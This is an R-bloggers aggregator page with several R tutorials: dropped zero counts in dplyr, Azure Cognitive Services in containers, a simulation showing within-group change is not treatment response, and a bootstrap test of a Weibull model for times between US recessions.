Subscribe to R bloggers feed R bloggers
R news and tutorials contributed by (750) R bloggers
Updated: 2 hours 57 min ago

Zero Counts in dplyr

Mon, 11/19/2018 - 22:53

(This article was first published on R on kieranhealy.org, and kindly contributed to R-bloggers)

Here’s a feature of dplyr that occasionally bites me (most recently while making these graphs). It’s about to change mostly for the better, but is also likely to bite me again in the future. If you want to follow along there’s a GitHub repo with the necessary code and data.

Say we have a data frame or tibble and we want to get a frequency table or set of counts out of it. In this case, each row of our data is a person serving a congressional term for the very first time, for the years 2013 to 2019. We have information on the term year, the party of the representative, and whether they are a man or a woman.

library(tidyverse) ## Hex colors for sex sex_colors <- c("#E69F00", "#993300") ## Hex color codes for Dem Blue and Rep Red party_colors <- c("#2E74C0", "#CB454A") ## Group labels mf_labs <- tibble(M = "Men", F = "Women") theme_set(theme_minimal()) ## Character vectors only, by default df <- read_csv("data/fc_sample.csv") df #> > df #> # A tibble: 280 x 4 #> pid start_year party sex #> #> 1 3160 2013-01-03 Republican M #> 2 3161 2013-01-03 Democrat F #> 3 3162 2013-01-03 Democrat M #> 4 3163 2013-01-03 Republican M #> 5 3164 2013-01-03 Democrat M #> 6 3165 2013-01-03 Republican M #> 7 3166 2013-01-03 Republican M #> 8 3167 2013-01-03 Democrat F #> 9 3168 2013-01-03 Republican M #> 10 3169 2013-01-03 Democrat M #> # ... with 270 more rows

When we load our data into R with read_csv, the columns for party and sex are parsed as character vectors. If you’ve been around R for any length of time, and especially if you’ve worked in the tidyverse framework, you’ll be familiar with the drumbeat of “stringsAsFactors=FALSE”, by which we avoid classing character variables as factors unless we have a good reason to do so (there are several good reasons), and we don’t do so by default. Thus our df tibble shows us instead of for party and sex.

Now, let’s say we want a count of the number of men and women elected by party in each year. (Congressional elections happen every two years.) We write a little pipeline to group the data by year, party, and sex, count up the numbers, and calculate a frequency that’s the proportion of men and women elected that year within each party. That is, the frequencies of M and F will sum to 1 for each party in each year.

df %>% group_by(start_year, party, sex) %>% summarize(N = n()) %>% mutate(freq = N / sum(N)) #> # A tibble: 14 x 5 #> # Groups: start_year, party [8] #> start_year party sex N freq #> #> 1 2013-01-03 Democrat F 21 0.362 #> 2 2013-01-03 Democrat M 37 0.638 #> 3 2013-01-03 Republican F 8 0.101 #> 4 2013-01-03 Republican M 71 0.899 #> 5 2015-01-03 Democrat M 1 1 #> 6 2015-01-03 Republican M 5 1 #> 7 2017-01-03 Democrat F 6 0.24 #> 8 2017-01-03 Democrat M 19 0.76 #> 9 2017-01-03 Republican F 2 0.0667 #> 10 2017-01-03 Republican M 28 0.933 #> 11 2019-01-03 Democrat F 33 0.647 #> 12 2019-01-03 Democrat M 18 0.353 #> 13 2019-01-03 Republican F 1 0.0323 #> 14 2019-01-03 Republican M 30 0.968

You can see that, in 2015, neither party had a woman elected to Congress for the first time. Thus, the freq is 1 in row 5 and row 6. But you can also see that, because there are no observed Fs in 2015, they don’t show up in the table at all. The zero values are dropped. These rows, call them 5' and 6' don’t appear:

#> start_year party sex N freq #> 5' 2015-01-03 Democrat F 0 0 #> 6' 2015-01-03 Republican F 0 0

How is that going to bite us? Let’s add some graphing instructions to the pipeline, first making a stacked column chart:

df %>% group_by(start_year, party, sex) %>% summarize(N = n()) %>% mutate(freq = N / sum(N)) %>% ggplot(aes(x = start_year, y = freq, fill = sex)) + geom_col() + scale_y_continuous(labels = scales::percent) + scale_fill_manual(values = sex_colors, labels = c("Women", "Men")) + labs(x = "Year", y = "Percent", fill = "Group") + facet_wrap(~ party) ggsave("figures/df_chr_col.png")

Stacked column chart based on character-encoded values.

That looks fine. You can see in each panel the 2015 column is 100% Men. If we were working on this a bit longer we’d polish up the x-axis so that the dates were centered under the columns. But as an exploratory plot it’s fine.

But let’s say that, instead of a column plot, you looked at a line plot instead. This would be a natural thing to do given that time is on the x-axis and so you’re looking at a trend, albeit one over a small number of years.

df %>% group_by(start_year, party, sex) %>% summarize(N = n()) %>% mutate(freq = N / sum(N)) %>% ggplot(aes(x = start_year, y = freq, color = sex)) + geom_line(size = 1.1) + scale_y_continuous(labels = scales::percent) + scale_color_manual(values = sex_colors, labels = c("Women", "Men")) + guides(color = guide_legend(reverse = TRUE)) + labs(x = "Year", y = "Percent", color = "Group") + facet_wrap(~ party) ggsave("figures/df_chr_line.png")

A line graph based on character-encoded variables for party and sex. The trend line for Women joins up the observed (or rather, the included) values, which don’t include the zero values for 2015.

That’s not right. The line segments join up the data points in the summary tibble, but because those don’t include the zero-count rows in the case of women, the lines join the 2013 and 2017 values directly. So we miss that the count (and thus the frequency) went to zero in that year.

This issue has been recognized in dplyr for some time. It happened whether your data was encoded as character or as a factor. There’s a huge thread about it in the development version on GitHub, going back to 2014. In the upcoming version 0.8 release of dplyr, the behavior for zero-count rows will change, but as far as I can make out it will change for factors only. Let’s see what happens when we change the encoding of our data frame. We’ll make a new one, called df_f.

df_f <- df %>% modify_if(is.character, as.factor) df_f %>% group_by(start_year, party, sex) %>% tally() #> # A tibble: 16 x 4 #> # Groups: start_year, party [8] #> start_year party sex n #> #> 1 2013-01-03 Democrat F 21 #> 2 2013-01-03 Democrat M 37 #> 3 2013-01-03 Republican F 8 #> 4 2013-01-03 Republican M 71 #> 5 2015-01-03 Democrat F 0 #> 6 2015-01-03 Democrat M 1 #> 7 2015-01-03 Republican F 0 #> 8 2015-01-03 Republican M 5 #> 9 2017-01-03 Democrat F 6 #> 10 2017-01-03 Democrat M 19 #> 11 2017-01-03 Republican F 2 #> 12 2017-01-03 Republican M 28 #> 13 2019-01-03 Democrat F 33 #> 14 2019-01-03 Democrat M 18 #> 15 2019-01-03 Republican F 1 #> 16 2019-01-03 Republican M 30

Now we have party and sex encoded as unordered factors. This time, our zero rows are present (here as rows 5 and 7). The grouping and summarizing operation has preserved all the factor values by default, instead of dropping the ones with no observed values in any particular year. Let’s run our line graph code again:

df_f %>% group_by(start_year, party, sex) %>% summarize(N = n()) %>% mutate(freq = N / sum(N)) %>% ggplot(aes(x = start_year, y = freq, color = sex)) + geom_line(size = 1.1) + scale_y_continuous(labels = scales::percent) + scale_color_manual(values = sex_colors, labels = c("Women", "Men")) + guides(color = guide_legend(reverse = TRUE)) + labs(x = "Year", y = "Percent", color = "Group") + facet_wrap(~ party) ggsave("figures/df_fac_line.png")

A line graph based on factor-encoded variables for party and sex. Now the trend line for Women does include the zero values, as they are preserved in the summary.

Now the trend line goes to zero, as it should. (And by the same token the trend line for Men goes to 100%.)

What if we want to keep working with our variables encoded as characters rather than factors? There is a workaround, using the complete() function. You will need to ungroup() the data after summarizing it, and then use complete() to fill in the implicit missing values. You have to re-specify the grouping structure for complete, and then tell it what you want the fill-in value to be for your summary variables. In this case it’s zero.

## using df again, with variables df %>% group_by(start_year, party, sex) %>% summarize(N = n()) %>% mutate(freq = N / sum(N)) %>% ungroup() %>% complete(start_year, party, sex, fill = list(N = 0, freq = 0)) #> # A tibble: 16 x 5 #> start_year party sex N freq #> #> 1 2013-01-03 Democrat F 21 0.362 #> 2 2013-01-03 Democrat M 37 0.638 #> 3 2013-01-03 Republican F 8 0.101 #> 4 2013-01-03 Republican M 71 0.899 #> 5 2015-01-03 Democrat F 0 0 #> 6 2015-01-03 Democrat M 1 1 #> 7 2015-01-03 Republican F 0 0 #> 8 2015-01-03 Republican M 5 1 #> 9 2017-01-03 Democrat F 6 0.24 #> 10 2017-01-03 Democrat M 19 0.76 #> 11 2017-01-03 Republican F 2 0.0667 #> 12 2017-01-03 Republican M 28 0.933 #> 13 2019-01-03 Democrat F 33 0.647 #> 14 2019-01-03 Democrat M 18 0.353 #> 15 2019-01-03 Republican F 1 0.0323 #> 16 2019-01-03 Republican M 30 0.968

If we re-draw the line plot with the ungroup() ... complete() step included, we’ll get the correct output in our line plot, just as in the factor case.

df %>% group_by(start_year, party, sex) %>% summarize(N = n()) %>% mutate(freq = N / sum(N)) %>% ungroup() %>% complete(start_year, party, sex, fill = list(N = 0, freq = 0)) %>% ggplot(aes(x = start_year, y = freq, color = sex)) + geom_line(size = 1.1) + scale_y_continuous(labels = scales::percent) + scale_color_manual(values = sex_colors, labels = c("Women", "Men")) + guides(color = guide_legend(reverse = TRUE)) + labs(x = "Year", y = "Percent", color = "Group") + facet_wrap(~ party) ggsave("figures/df_chr_line_2.png")

Same as before, but based on the character-encoded version.

The new zero-preserving behavior of group_by() for factors will show up in the upcoming version 0.8 of dplyr. It’s already there in the development version if you like to live dangerously. In the meantime, if you want your frequency tables to include zero counts, then make sure you ungroup() and then complete() the summary tables.

var vglnk = { key: '949efb41171ac6ec1bf7f206d57e90b8' }; (function(d, t) { var s = d.createElement(t); s.type = 'text/javascript'; s.async = true; s.src = '//cdn.viglink.com/api/vglnk.js'; var r = d.getElementsByTagName(t)[0]; r.parentNode.insertBefore(s, r); }(document, 'script'));

To leave a comment for the author, please follow the link and comment on their blog: R on kieranhealy.org. R-bloggers.com offers daily e-mail updates about R news and tutorials on topics such as: Data science, Big Data, R jobs, visualization (ggplot2, Boxplots, maps, animation), programming (RStudio, Sweave, LaTeX, SQL, Eclipse, git, hadoop, Web Scraping) statistics (regression, PCA, time series, trading) and more...

Cognitive Services in Containers

Mon, 11/19/2018 - 21:41

(This article was first published on Revolutions, and kindly contributed to R-bloggers)

I've posted several examples here of using Azure Cognitive Services for data science applications. You can upload an an image or video to the service and extract information about faces and emotions, generate a caption describing a scene from a provided photo, or speak written text in a natural voice. (If you haven't tried the Cognitive Services tools yet, you can try them out using the instructions in this notebook using only a browser.)

But what if you can't upload an image or text to the cloud? Sending data outside your network might be subject to regulatory or privacy policies. And if you could analyze the images or text locally, your application could benefit from reduced latency and bandwidth. 

Now, several of the Azure Cognitive Services APIs are available as Docker containers: you can download a container that provides the exact same APIs as the cloud-based services, and run it on a local Linux-based server or edge device. Images and text are processed directly in the container and never sent to the cloud. A connection to Azure is required only for billing, which is at the same rate as the cloud-based services (including a free tier).

The services now available as containers are:

You can learn more about Cognitive Services in the video below. (The information about the new container support starts at 11:20.)

You can also find detailed information about the Cognitive Services in containers in the blog post linked below.

Microsoft Azure blog: Getting started with Azure Cognitive Services in containers

var vglnk = { key: '949efb41171ac6ec1bf7f206d57e90b8' }; (function(d, t) { var s = d.createElement(t); s.type = 'text/javascript'; s.async = true; s.src = '//cdn.viglink.com/api/vglnk.js'; var r = d.getElementsByTagName(t)[0]; r.parentNode.insertBefore(s, r); }(document, 'script'));

To leave a comment for the author, please follow the link and comment on their blog: Revolutions. R-bloggers.com offers daily e-mail updates about R news and tutorials on topics such as: Data science, Big Data, R jobs, visualization (ggplot2, Boxplots, maps, animation), programming (RStudio, Sweave, LaTeX, SQL, Eclipse, git, hadoop, Web Scraping) statistics (regression, PCA, time series, trading) and more...

Change over time is not “treatment response”

Mon, 11/19/2018 - 19:20

(This article was first published on R Psychologist - R, and kindly contributed to R-bloggers)

This will be a non-technical post illustrating the problems with identifying treatment responders or non-responders using inappropriate within-group analyses. Specifically, I will show why it is pointless to try to identify a subgroup of non-responders using a naïve analysis of data from one treatment group only, even though we have weekly measures over time.

This type of unwarranted and misleading causal language is surprisingly common. You see this type of language even when the data comes from an RCT, often in secondary analyses of mediators, predictors, or in even trendier studies where the authors have a strong urge to mix omics (e.g., genomics) and artificial intelligence/machine learning for vague reasons.

Defining treatment response

When we talk about “treatment response” we usually mean the causal estimand, i.e., the counterfactual comparison of the effect of receiving the treatment versus not-receiving the treatment. Deep down we all know that a treatment outcome is a relative contrast, and not simply a patient’s change from pre to posttest. We can (usually) only estimate the effect of the treatment on the group level, by randomizing patients to a treatment or a control group and estimating the average treatment effect by comparing the expected outcome in the two groups. The rate at which we tend to “forget” this basic knowledge seems directly related to our drive to publish in high impact journals.

Simulating the problem # Packages used library(tidyverse) library(powerlmm) # dev version library(ggrepel)

I will use powerlmm to simulate some longitudinal treatment data. In this setup, the control group has a ~40% reduction in symptoms at posttest, which in this case would give a Cohen’s d of 0.5. And the actual treatment effect is d = 0.5, i.e., a 7 point difference at posttest between the treatment and control group. These would not be surprising numbers in some psychiatric trials.

p <- study_parameters(design = study_design(), n1 = 11, n2 = 200, fixed_intercept = 17, fixed_slope = -7/10, icc_pre_subject = 0.5, var_ratio = 0.03, cor_subject = -0.5, effect_size = cohend(-0.5) ) plot(p, type = "trend", RE = FALSE) + theme_minimal() + scale_color_manual(values = c("Control" = "gray66", "Treatment" = "#0984e3"))

Creating the subgroups

We want to add a subgroup of “non-responders”, and we do this by simply assigning subjects to group A or B based on their latent random slopes. This is easily done using the data_transform argument. The non-responders have subject-specific slopes 1 SD above the mean. Obviously, this is a bit simplistic, but it gets the point across.

add_subgroup <- function(d) { # 1.73 is the slope SD d$subgroup <- ifelse(d$subject_slope < 1.73, "B", "A") d$subgroup <- factor(d$subgroup) d }

If we plot one realization of the latent slopes from this data generating process, we get this figure.


code

set.seed(1234) p0 <- p %>% update(n2 = 1000) %>% simulate_data %>% add_subgroup() %>% mutate(mu = fixed_intercept + subject_intercept + (fixed_slope + subject_slope) * time) %>% ggplot(aes(time, mu, group = subject)) + geom_line(aes(color = subgroup, alpha = subgroup)) + geom_text_repel(data = data.frame(mu = 25, time = 5), aes(group = NULL), direction = "y", ylim = c(45,NA), point.padding = 1, arrow = arrow(length = unit(0.02, "npc")), label.size = NA, segment.color = "gray35", label = "A subgroup with participants that\n tend to decline over time") + scale_color_manual(values = c("B" = "gray66", "A" = "#0984e3")) + scale_alpha_manual(values = c("B" = 0.25, "A" = 0.75)) + theme_minimal() + theme(legend.position = "bottom") + labs(title = "Treatment group")

A naïve analysis: Using only the treatment group

Let’s say we have access to data from a clinic that carefully monitor their patients’ change during treatment (e.g., IAPT). The sample size is large, and we want to identify if there is a subgroup of patients that are “non-responders”. There is no control group, but we have weekly measures during the treatment (there is also perfect adherence and no dropout…), we also have access to some cool baseline marker data that will impress reviewers and enable “personalized treatment selection for non-responding patients”. So what we do is run an analysis to identify if there is an interaction between our proposed subgroup variable and change over time. Let’s run such a simulation.

add_subgroup_tx_only <- function(d) { d$subgroup <- ifelse(d$subject_slope < 1.73, "B", "A") d$subgroup <- factor(d$subgroup) d <- dplyr::filter(d, treatment == 1) d } f <- sim_formula("y ~ subgroup * time + (1 + time | subject)", data_transform = add_subgroup_tx_only, test = c("time")) res <- simulate(p, formula = f, nsim = 5000, cores = 16) summary(res) ## Model: default ## ## Random effects ## ## parameter M_est theta est_rel_bias prop_zero is_NA ## subject_intercept 89.00 100.0 -0.11 0 0 ## subject_slope 1.70 3.0 -0.44 0 0 ## error 100.00 100.0 0.00 0 0 ## cor_subject -0.39 -0.5 -0.22 0 0 ## ## Fixed effects ## ## parameter M_est theta M_se SD_est Power Power_bw Power_satt ## (Intercept) 9.3 17.0 2.00 1.90 1.00 . NaN ## subgroupB 9.1 . 2.10 2.10 0.99 . NaN ## time 1.2 -0.7 0.29 0.22 1.00 1 NaN ## subgroupB:time -3.1 . 0.31 0.25 1.00 . NaN ## --- ## Number of simulations: 5000 | alpha: 0.05 ## Time points (n1): 11 ## Subjects per cluster (n2 x n3): 200 (treatment) ## 200 (control) ## Total number of subjects: 400 ## --- ## At least one of the models applied a data transformation during simulation, ## summaries that depend on the true parameter values will no longer be correct, ## see 'help(summary.plcp_sim)'

We see that we tend to identify a powerful subgroup effect, participants in the A subgroup tend to change less and even deteriorate during the treatment. Surely, this is substantial proof that there is a differential treatment response and that these patients did not respond to the treatment? I’m sure you know the answer, but to be sure let us also run the simulation were we have access to some similar data from another source that actually randomized their patients to receive either the treatment or a placebo control. What we want now is to identify an interaction between the subgroup variable and the treatment-by-time interaction. So we update the simulation formula.

f2 <- sim_formula("y ~ subgroup * time * treatment + (1 + time | subject)", data_transform = add_subgroup) res2 <- simulate(p, formula = f2, nsim = 5000, cores = 16) summary(res2) ## Model: default ## ## Random effects ## ## parameter M_est theta est_rel_bias prop_zero is_NA ## subject_intercept 89.0 100.0 -0.11 0 0 ## subject_slope 1.7 3.0 -0.44 0 0 ## error 100.0 100.0 0.00 0 0 ## cor_subject -0.4 -0.5 -0.21 0 0 ## ## Fixed effects ## ## parameter M_est theta M_se SD_est Power Power_bw Power_satt ## (Intercept) 9.40 17.00 2.00 1.90 1.00 . NaN ## subgroupB 9.00 . 2.10 2.10 0.99 . NaN ## time 1.90 -0.70 0.29 0.22 1.00 . NaN ## treatment -0.01 0.00 2.80 2.70 0.04 . NaN ## subgroupB:time -3.10 . 0.31 0.26 1.00 . NaN ## subgroupB:treatment 0.02 . 3.00 3.00 0.04 . NaN ## time:treatment -0.71 -0.71 0.41 0.32 0.39 0.39 NaN ## subgroupB:time:treatment 0.00 . 0.44 0.36 0.02 . NaN ## --- ## Number of simulations: 5000 | alpha: 0.05 ## Time points (n1): 11 ## Subjects per cluster (n2 x n3): 200 (treatment) ## 200 (control) ## Total number of subjects: 400 ## --- ## At least one of the models applied a data transformation during simulation, ## summaries that depend on the true parameter values will no longer be correct, ## see 'help(summary.plcp_sim)'

Using the appropriate estimand of a subgroup effect we now get the “disappointing” result that there is absolutely no difference in treatment response for participants in subgroup A or B. The coefficient subgroupB:time:treatment is zero on average. To make it even more clear what is going on let us also plot the trends.


code

# Calculate trends tmp <- expand.grid(time = 0:10, subgroup = c("A", "B")) X <- model.matrix(~subgroup * time, data = tmp) b_hat <- summary(res)$summary$default$FE[, "M_est"] tmp$y <- c(X %*% b_hat) TE <- tmp %>% filter(time == 10) %>% spread(subgroup, y) # Plot treatment group only p0 <- ggplot(tmp, aes(time, y, group = subgroup, linetype = subgroup, color = subgroup)) + geom_line(aes(size = subgroup)) + annotate("rect", xmin = 10, xmax = Inf, ymin = -Inf, ymax = Inf, fill = "white") + geom_segment(data = TE, aes(xend = time, y = A, yend = B, linetype = NULL, color = NULL, group = NULL), arrow = arrow(length = unit(0.02, "npc"), ends = "both") ) + geom_text_repel(data = filter(tmp, time == 10), alpha = 0.77, aes(y = y, label = paste("Subgroup: ", subgroup), group = NULL), direction = "x", xlim = c(10.5, NA) ) + geom_text_repel(data = filter(tmp, time == 6, subgroup == "A"), alpha = 0.77, aes(y = y, label = "By only analyzing change within the treatment group\nwe get the impression that we can use Subgroup A to identify 'non-responders'", group = NULL, color = NULL), direction = "y", arrow = arrow(length = unit(0.02, "npc")), point.padding = 1, ylim = c(25, NA) ) + geom_text(data = TE, aes(group = NULL, color = NULL, linetype = NULL, y = (A+B)/2, label = paste("A - B:", round(A - B, 0))), point.padding = 1, direction = "x", nudge_x = 0.5, hjust = 0, arrow = arrow(length = unit(0.02, "npc")), xlim = c(10.5,NA), label.size = NA, segment.color = "gray35" ) + theme_minimal() + theme(legend.position = "none") + scale_color_manual(values = c("B" = "gray50", "A" = "#00b894")) + scale_size_manual(values = c("B" = 0.75, "A" = 1)) + coord_cartesian(xlim = c(0, 14), ylim = c(0, 30)) + labs(title = "Treatment group only") # Calculate trends for RCT tmp <- expand.grid(time = 0:10, treatment = factor(0:1, labels = c("Control", "Treatment")), subgroup = c("A", "B")) X <- model.matrix(~subgroup * time * treatment, data = tmp) b_hat <- summary(res2)$summary$default$FE[, "M_est"] tmp$y <- c(X %*% b_hat) TE <- tmp %>% filter(time == 10) %>% spread(treatment, y) # Plot RCT p1 <- ggplot(tmp, aes(time, y, group = interaction(subgroup, treatment), color = treatment, linetype = subgroup)) + geom_line(aes( size = treatment)) + annotate("rect", xmin = 10, xmax = Inf, ymin = -Inf, ymax = Inf, fill = "white") + geom_segment(data = TE, aes(xend = time, y = Treatment, yend = Control, group = subgroup, linetype = NULL, color = NULL), arrow = arrow(length = unit(0.02, "npc"), ends = "first") ) + geom_text_repel(data = filter(tmp, time == 6, subgroup == "A", treatment == "Treatment"), alpha = 0.77, aes(y = y, label = "In the correct analysis we see that the 'non-responders'\nactually improved just as much as the 'responders'", group = NULL, color = NULL), direction = "y", arrow = arrow(length = unit(0.02, "npc")), point.padding = 1, ylim = c(25, NA), xlim = c(NA, 8) ) + geom_text_repel(data = filter(tmp, time == 10), alpha = 0.77, aes(y = y, label = paste(treatment, ": ", subgroup), color = treatment, group = NULL), direction = "x", xlim = c(10.5, NA) ) + geom_text(data = TE, aes(group = NULL, color = NULL, linetype = NULL, y = (Treatment+Control)/2, label = round(Treatment - Control, 0)), point.padding = 1, direction = "x", nudge_x = 0.5, arrow = arrow(length = unit(0.02, "npc")), xlim = c(10.5,NA), label.size = NA, segment.color = "gray35" ) + theme_minimal() + theme(legend.position = "none") + scale_color_manual(values = c("Control" = "gray66", "Treatment" = "#0984e3")) + scale_size_manual(values = c("Control" = 0.75, "Treatment" = 1)) + coord_cartesian(xlim = c(0, 14), ylim = c(0, 30)) + labs(title = "Treatment and control")

We see that the “non-responders” actually improved just as much as the “responders” when compared to the control group. The effect from the naïve within-group analysis clearly confounds treatment response with just “change”. You might think that there is no reason why Subgroup A would start deteriorating just as they enter the study. It is easy to think of different explanations for this; one explanation might be that the marker we used to identify the subgroup is related to some personality trait that makes participants more likely to seek treatment when they feel “good enough to start treatment”. It is not uncommon to hear such reasoning. During the study period these patients will tend to regress toward their typical symptom level, but the deterioration is somewhat slowed down thanks to the treatment. Patients in subgroup B on the other hand, seek treatment because they have felt worse than usual for a period. So our marker for “treatment response” do not identify responders and non-responders it simply identifies patients on different trajectories, i.e., it is a prognostic marker.

The point of this post is not just semantics (treatment response versus change). The take-home message is important: by using the naïve analysis and the unwarranted causal language, we risk spreading the misinformation that patients belonging to subgroup A do no benefit from the treatment, when in fact they do. This risks creating an unnecessary stigma for a patient group that might already be seen as “difficult”, and inspire suboptimal “personalized” treatments that could be less likely to work.

var vglnk = { key: '949efb41171ac6ec1bf7f206d57e90b8' }; (function(d, t) { var s = d.createElement(t); s.type = 'text/javascript'; s.async = true; s.src = '//cdn.viglink.com/api/vglnk.js'; var r = d.getElementsByTagName(t)[0]; r.parentNode.insertBefore(s, r); }(document, 'script'));

To leave a comment for the author, please follow the link and comment on their blog: R Psychologist - R. R-bloggers.com offers daily e-mail updates about R news and tutorials on topics such as: Data science, Big Data, R jobs, visualization (ggplot2, Boxplots, maps, animation), programming (RStudio, Sweave, LaTeX, SQL, Eclipse, git, hadoop, Web Scraping) statistics (regression, PCA, time series, trading) and more...

The Distribution of Time Between Recessions: Revisited (with MCHT)

Mon, 11/19/2018 - 17:00

(This article was first published on R – Curtis Miller's Personal Website, and kindly contributed to R-bloggers)

Introduction

These past few weeks I’ve been writing about a new package I created, MCHT. Those blog posts were basically tutorials demonstrating how to use the package. (Read the first in the series here.) I’m done for now explaining the technical details of the package. Now I’m going to use the package for purpose I initially had: exploring the distribution of time separating U.S. economic recessions.

I wrote about this before. I suggested that the distribution of times between recessions can be modeled with a Weibull distribution, and based on this, a recession was likely to occur prior to the 2020 presidential election.

This claim raised eyebrows, and I want to respond to some of the comments made. Now, I would not be surprised to find this post the subject of an R1 on r/badeconomics, and I hope that no future potential employer finds this (or my previous) post, reads it, and then decides I’m an idiot and denies me a job. I don’t know enough to dogmatically subscribe to the idea but I do want to explore it. Blog posts are not journal articles, and I think this is a good space for me to make arguments that could be wrong and then see how others more intelligent than myself respond. The act of keeping a blog is good for me and my learning (which never ends).

Past Responses

My previous post on the distribution of times between recessions was… controversial. Have a look at the comments section of the original article and the comments of this reddit thread. Here is my summarization of some of the responses:

  1. There was no statistical test for the goodness-of-fit of the Weibull distribution.
  2. No data generating process (DGP) was proposed, in the sense that there’s no explanation for why the Weibull distribution would be appropriate, or the economic processes that produce memory in the distribution of times between recessions.
  3. Isn’t it strange to suggest that other economic variables are irrelevant to when a recession occurs? That seems counterintuitive.
  4. MAGA! (actually there were no MAGAs, thankfully)

Then there was this comment, by far the harshest one, by u/must_not_forget_pwd:

The idea that recessions are dependent on time is genuinely laughable. It is an idea that seems to be getting some traction in the chattering classes, who seem more interested in spewing forth political rantings rather than even the semblance of serious analysis. This also explains why no serious economist talks about the time and recession relationship.

The lack of substance behind this time and recession idea is revealed by asking some very basic questions and having a grasp of some basic data. If recessions were so predictable, wouldn’t recessions be easy to prevent? Monetary and fiscal policies could be easily manipulated so as to engineer a persistent boom.

Also, if investors could correctly predict the state of the economy it would be far easier for them to determine when to invest and to capture the subsequent boom. That is, invest in the recession, when goods and services are cheaper and have the project come on stream during the following boom and make a massive profit. If enough investors acted like this, there would be no recession to begin with due to the increase in investment.

Finally, have a look at the growth of other countries. Australia hasn’t had two consecutive quarters of negative growth since the 1990-91 recession. Sure there have been hiccups along the way for Australia, such as the Asian Financial Crisis, the introduction of the GST, a US recession in the early 2000s, and more recently the Global Financial Crisis. Yet, Australia has managed to persist without a recession despite the passage of time. No one in Australia would take you seriously if you said that recessions were time dependent.

If these “chattering classes” were interested in even half serious analysis of the US economy, while still wanting to paint a bleak picture, they could very easily look at what is going on right now. Most economists have the US economy growing above trend. This can be seen in the low unemployment rate and that inflation is starting to pickup. Sure wages growth is subdued, but wages growth should be looking to pickup anytime now.

However, during this period the US government is injecting a large amount of fiscal stimulus into the US economy through tax cuts. Pumping large amounts of cash into the economy during a boom isn’t exactly a good thing to do and is a great way to overheat the economy and bring about higher inflation. This higher inflation would then cause the US Federal Reserve to react by increasing interest rates. This in turn could spark a US recession.

Instead of this very simple and defensible story that requires a little bit of homework, we get subjected to this nonsense that recessions are linked to time. I think it’s time that people call out as nonsense the “analysis” that this blog post has.

TL;DR: The idea that recessions are dependent on time is dumb, and if recessions were so easy to predict would mean that recessions wouldn’t exist. This doesn’t mean that a US recession couldn’t happen within the next few years, because it is easy to see how one could occur.

I think that the tone of this message could have been… nicer. That said, I generally welcome direct, harsh criticism, as I often learn a lot from it, or at least am given a lot to think about.

So let’s discuss these comments.

Goodness of Fit of the Weibull Distribution

First, a statistical test for the goodness of fit of the Weibull distribution. I personally was satisfied looking at the plots I made, but some people want a statistical test. The test that comes to mind is the Kolmogorov-Smirnov test, and R does support the simplest version of this test via ks.test(), but when you don’t know all of the parameters of the distribution assumed under the null hypothesis, then you cannot use ks.test(). This is because the test was derived assuming there were no unknown parameters; when nuisance parameters are present and need to be estimated, then the distribution used to compute -values is no longer appropriate.

Good news, though; MCHT allows us to do the test properly! First, let’s get set up.

library(MCHT) library(doParallel) library(fitdistrplus) recessions <- c( 4+ 2/12, 6+ 8/12, 3+ 1/12, 3+ 9/12, 3+ 3/12, 2+ 0/12, 8+10/12, 3+ 0/12, 4+10/12, 1+ 0/12, 7+ 8/12, 10+ 0/12, 6+ 1/12) registerDoParallel(detectCores())

I already demonstrated how to perform a bootstrap version of the Kolmogorov-Smirnov test in one of my blog posts about MCHT, and the code below is basically a direct copy of that code. While the test is not exact, it should be asymptotically appropriate.

ts <- function(x) { param <- coef(fitdist(x, "weibull")) shape <- param[['shape']]; scale <- param[['scale']] ks.test(x, pweibull, shape = shape, scale = scale, alternative = "two.sided")$statistic[[1]] } rg <- function(x) { n <- length(x) param <- coef(fitdist(x, "weibull")) shape <- param[['shape']]; scale <- param[['scale']] rweibull(n, shape = shape, scale = scale) } b.wei.ks.test <- MCHTest(test_stat = ts, stat_gen = ts, rand_gen = rg, seed = 123, N = 1000, method = paste("Goodness-of-Fit Test for Weibull", "Distribution")) b.wei.ks.test(recessions) ## ## Goodness-of-Fit Test for Weibull Distribution ## ## data: recessions ## S = 0.11318, p-value = 0.94

The test does not reject the null hypothesis; there isn’t evidence that the data is not following a Weibull distribution (according to that test; read on).

Compare this to the Kolmogorov-Smirnov test checking whether the data follows the exponential distribution.

ts <- function(x) { mu <- mean(x) ks.test(x, pexp, rate = 1/mu, alternative = "two.sided")$statistic[[1]] } rg <- function(x) { n <- length(x) mu <- mean(x) rexp(n, rate = 1/mu) } b.ks.exp.test <- MCHTest(ts, ts, rg, seed = 123, N = 1000, method = paste("Goodness-of-Fit Test for Exponential", "Distribution")) b.ks.exp.test(recessions) ## ## Goodness-of-Fit Test for Exponential Distribution ## ## data: recessions ## S = 0.30074, p-value = 0.023

Here, the null hypothesis is rejected; there is evidence that the data wasn’t drawn from an exponential distribution.

What do the above two results signify? If we assume that the time between recessions is independent and identically distributed, then there is not evidence against the Weibull distribution, but there is evidence against the exponential distribution. (The exponential distribution is actually a special case of the Weibull distribution, so the second test effectively rules out that special case.) The exponential distribution has the memoryless property; if we say that the time between events follows an exponential distribution, then knowing that it’s been minutes since the last event occurs tells us nothing about when the next event occurs. The Weibull distribution, however, has memory when the shape parameter is not 1. That is, knowing how long it’s been since the last event occured does change how likely the event is to occur in the near future. (For the parameter estimates I found, a recession seems to become more likely the longer it’s been since the last one.)

We will revisit the goodness of fit later, though.

How Recessions Occur

I do have some personal beliefs about what causes recessions to occur that would lead me to think that the time between recessions does exhibit some form of memory and would also address the point raised by u/must_not_forget_pwd about Australia not having had a recession in decades. This perspective is primarily shaped by two books, [1] and [2].

In short, I agree with the aforementioned reddit user; recessions are not inevitable. The stability of an economy is a characteristic of that economy and some economies are more stable than others. [1] notes that the Canadian economy had a dearth of banking crises in the 19th and 20th centuries, with the most recent one effectively due to the 2008 crisis in the United States. Often the stability of the financial sector (and probably the economy as a whole) is strongly related to the political coalition responsible for drafting the de facto rules that the financial system follows. In some cases the financial sector is politically weak and continuously plundered by the government. Sometimes it’s politically weak and allowed to exist unmolested by the government but is well whipped. Financiers are allowed to make money and the government repays its debts but if the financial sector steps out of line and takes on too much risk it will be punished. And then there’s the situation where the financial sector is politically powerful and able to get away with bad behavior, perhaps even being rewarded for that behavior by government bailouts. That’s the financial system the United States has.

